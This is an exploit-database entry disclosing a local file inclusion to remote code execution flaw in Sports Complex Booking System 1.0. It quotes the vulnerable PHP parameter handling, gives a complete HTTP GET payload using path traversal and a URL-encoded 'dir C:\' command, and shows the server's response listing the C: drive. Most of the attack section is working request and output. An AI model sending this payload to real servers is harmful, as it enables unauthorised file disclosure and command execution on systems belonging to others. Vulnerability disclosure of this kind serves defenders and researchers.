id: 37554
date: 03/30/2022
title: Sports Complex Booking System 1.0 Local File Inclusion Vulnerability
author: Hejap Zairy
cves: 

# Title: Sports Complex Booking System  1.0  LFI To RCE
# Author: Hejap Zairy
# Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache



#vulnerability Code  php
Needs more filtering require_once

php```
----
<?php $page = isset($_GET['p']) ? $_GET['p'] : 'home';  ?>
<?php require_once('inc/topBarNav.php') ?>
     <?php if($_settings->chk_flashdata('success')): ?>
      <script>
        alert_toast("<?php echo $_settings->flashdata('success') ?>",'success')
      </script>
----
```


[+] Payload GET


```
GET /scbs/?p=../../../0day&515=%64%69%72%20%43%3a%5c HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg
Upgrade-Insecure-Requests: 1
```


#Status: CRITICAL



#Response 
```
HTTP/1.1 200 OK
Date: Sun, 28 Mar 2022 08:05:28 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 17
Connection: close
Content-Type: text/html; charset=UTF-8`
</script>      Volume in drive C is OS
 Volume Serial Number is 2EF1-9DCA

 Directory of C:\

03/26/2022  08:51 PM    <DIR>          0day
03/26/2022  02:12 PM                19 0day.php
03/17/2022  06:06 AM            12,288 DumpStack.log
03/24/2022  07:14 PM    <DIR>          Intel
10/31/2021  12:47 AM    <DIR>          MinGW
10/31/2021  12:58 AM    <DIR>          mingw32
05/12/2018  08:20 PM    <DIR>          mingw64
10/31/2021  12:47 AM    <DIR>          msys64
01/02/2022  09:28 AM    <DIR>          pen
06/05/2021  03:10 PM    <DIR>          PerfLogs
03/18/2022  10:27 AM    <DIR>          Program Files
03/21/2022  01:45 PM    <DIR>          Program Files (x86)
03/02/2022  11:04 PM    <DIR>          Python27
01/30/2022  02:34 PM               474 t.txt
03/26/2022  08:33 PM    <DIR>          Temp
03/26/2022  08:45 PM    <DIR>          Users
```


# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce


# Proof and Exploit:
https://i.imgur.com/tUWZM0X.png
https://i.imgur.com/vrPCGTp.png
https://i.imgur.com/sMyZder.png

#  0day.today [2023-03-23]  #